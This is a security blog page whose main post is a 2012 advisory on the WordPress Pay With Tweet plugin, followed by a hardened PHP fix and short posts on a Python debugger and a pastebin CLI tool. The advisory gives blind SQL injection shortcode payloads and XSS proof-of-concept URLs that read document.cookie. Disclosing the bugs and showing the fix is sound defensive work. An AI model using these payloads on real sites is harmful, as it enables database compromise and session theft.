Welcome to Cloudberry Engineering
a notebook on building, breaking and securing systems by Gianluca Brindisi.
  • # Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
    # Date: 01/06/2012
    # Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
    # Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
    # Version: 1.1
    

    1) Blind SQL Injection in shortcode:

    The shortcode parameter ‘id’ is prone to blind SQL injection; you need to be able to write a post/page to exploit this:

    [paywithtweet id="1' AND 1=2"]
    [paywithtweet id="1' AND 1=1"]
    

    2) Multiple XSS in pay.php

    http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php

    After connecting to twitter:

    ?link=&22></input>[XSS]
    

    After submitting the tweet:

    ?title=[XSS]&dl=[REDIRECT-TO-URL]')")[XSS]
    

    The final download link will be replaced with [REDIRECT-TO-URL]

    POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"<script>alert(document.cookie)</script>

    # / #wordpress #advisory #sql-injection #xss
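The two weaknesses above (a shortcode attribute spliced into SQL, and request parameters echoed into HTML) have a standard fix in WordPress plugin code: coerce and parameterise on the way into the database, and escape for the right context on the way out. The following is an added example of that hardened pattern, written for this page; it is not the Pay With Tweet plugin's code, and the `cbe_` function names, the table name and the column names are assumptions.

```php
<?php
// Added example, not the plugin's own code. Function names, the table
// name and the column names below are assumptions for illustration.

// 1) Shortcode attribute 'id': never concatenate it into a query string.
//    A value such as  1' AND 1=1  is coerced to the integer 1 by absint()
//    and then bound with %d, so the quote can no longer change the SQL.
function cbe_paywithtweet_shortcode( $atts ) {
    global $wpdb;

    $atts = shortcode_atts( array( 'id' => 0 ), $atts, 'paywithtweet' );

    $id = absint( $atts['id'] );   // non-numeric junk becomes 0
    if ( 0 === $id ) {
        return '';
    }

    $table = $wpdb->prefix . 'paywithtweet';   // assumed table name
    $row   = $wpdb->get_row(
        $wpdb->prepare( "SELECT title, download_url FROM {$table} WHERE id = %d", $id )
    );
    if ( ! $row ) {
        return '';
    }

    // Escape at output time, per context: URL in an href, text in the body.
    return sprintf(
        '<a class="paywithtweet" href="%s">%s</a>',
        esc_url( $row->download_url ),
        esc_html( $row->title )
    );
}
add_shortcode( 'paywithtweet', 'cbe_paywithtweet_shortcode' );

// 2) pay.php request parameters (link, title, dl): each lands in a
//    different HTML context and must be escaped for that context.
//    The redirect target is additionally restricted to http(s).
function cbe_render_pay_form( array $query ) {
    $link  = isset( $query['link'] )  ? (string) $query['link']  : '';
    $title = isset( $query['title'] ) ? (string) $query['title'] : '';
    $dl    = isset( $query['dl'] )    ? (string) $query['dl']    : '';

    // esc_url() rejects unsafe schemes; the protocol list narrows it further.
    $dl_safe = esc_url( $dl, array( 'http', 'https' ) );

    // esc_attr() turns "> into &quot;&gt;, so the value cannot close the tag.
    $html  = '<input type="hidden" name="link" value="' . esc_attr( $link ) . '">' . "\n";
    // esc_html() neutralises <script> in text context.
    $html .= '<h2>' . esc_html( $title ) . '</h2>' . "\n";
    if ( '' !== $dl_safe ) {
        $html .= '<a href="' . $dl_safe . '">Download</a>' . "\n";
    }
    return $html;
}
```

Run against the PoC parameters quoted above, `cbe_render_pay_form()` emits the injected quotes and angle brackets as entities and drops a `dl` value whose scheme is not http or https, while the `id` coercion in the shortcode turns the two blind-injection payloads into the same harmless query for `id = 1`.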
  • Simple Debugger (sdbg) is a minimal Windows debugger I wrote to sharpen my knowledge of debugging practices.

    It’s written in Python and it’s obviously coded on top of the wonderful ctypes library. The overall architecture is heavily based on PyDbg, since I was already familiar with it.

    At the time of this writing it’s capable of setting software, hardware and memory breakpoints, it has a minimal interactive shell to retrieve register status, and it’s extensible with custom callbacks for handling exceptions.

    Building a debugger has been an awesome experience (except for the parts where I am swearing at the IA-32 Intel docs) and I really learned a lot - and this was the main goal.

    Since I am starting to get my feet wet in reverse engineering, I am looking to eat my own dogfood and use it for analysing some samples from my malware collection. This way I hope to keep it updated and maybe add some new features too.

    As usual everything is GPL'd and you can find it on my Bitbucket page.

    # / #python #debugging #reverse-engineering
  • Introducing xsssniper
  • Tor + Polipo on OpenBSD
    Since I haven’t managed to find a command line pastebin script that is based on the new APIs, I wrote one.

    You can find it on my bitbucket.

    Usage:

    $ pastebin.py -f python -e 10M -p 1 -t MyPaste < whatever
    

    Practically, you just pipe your data to the script.

    Here are some options:

    -f defines data format (php, python, etc)
    -e the expiry time (10M, 1G, 1D, N)
    -p the privacy (1 is private, 0 is public)
    -t the title of the paste
    

    The script looks for a config file in your home dir with your dev API key and optionally a username and a valid password (without valid login credentials your pastes will be anonymous).

    The first time you run it, it will create the config (~/.pastebin).

    Feel free to fork/edit/whatever it.

    # / #python #cli #pastebin